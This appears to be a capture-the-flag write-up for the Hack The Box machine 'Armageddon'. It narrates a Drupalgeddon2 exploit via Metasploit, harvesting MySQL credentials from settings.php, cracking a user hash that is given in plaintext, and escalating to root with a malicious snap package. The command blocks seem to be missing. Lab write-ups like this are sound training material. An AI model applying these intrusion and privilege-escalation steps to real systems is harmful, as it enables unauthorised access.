Armageddon
https://app.hackthebox.com/machines/323
Nmap
Port 80 hosts a web server which is visually identifiable as a Drupal instance.
Standard enumeration did not show any interest information. From here drupwn was utilized to identify the exact version of Drupal installed.
Github: https://github.com/immunIT/drupwn
Install
Usage
Searchsploit
**** shows that this version of Drupal is vulnerable to "Drupalgeddon".
Metasploit has a module for drupalgeddon2. Once the corrects options were set the exploit was executed.
Where we receive a meterpreter shell.
Now with a shell, we find we are working as the apache user. As Drupal is installed we perform some basic enumeration steps to look for MySQL
usernames and passwords. The command below can be used to scour the settings.php
file for this information.
Finding the above credentials we run a single command against MySQL
to find a hash for a user on the machine.
This hash is then cracked with john
to reveal the credentials: brucetherealadmin:boobo
.
We can now login over SSH
as the user brucetherealadmin.
From here linpeas.sh was utilized to help with Privilege Escalation identification.
We find the current user can run the /usr/bin/snap
binary as the root
user without specifying a password.
GTFOBins: https://gtfobins.github.io/gtfobins/snap/
From the above GTFOBins link we see that a malicious package can be crafted and used to execute the package in the context of the root
user.
The blog post linked below shows some ways in which this can be done.
Blog: https://blog.ikuamike.io/posts/2021/package_managers_privesc/#exploitation-snap
We can also use the below Snap_Generator to help us easily craft the required snap
packages.
Github: https://github.com/0xAsh/Snap_Generator
Install fpm (Required)
Download and prepare Snap_Generator
After running the above command we need to then issue a command to the snap_generator.sh script to use in our package. In this instance we will add a new root
user to the target system.
Upload the snap package to the target system.
After completion check for existence of the new user.
Once confirmed, switch over to the new user.
Last updated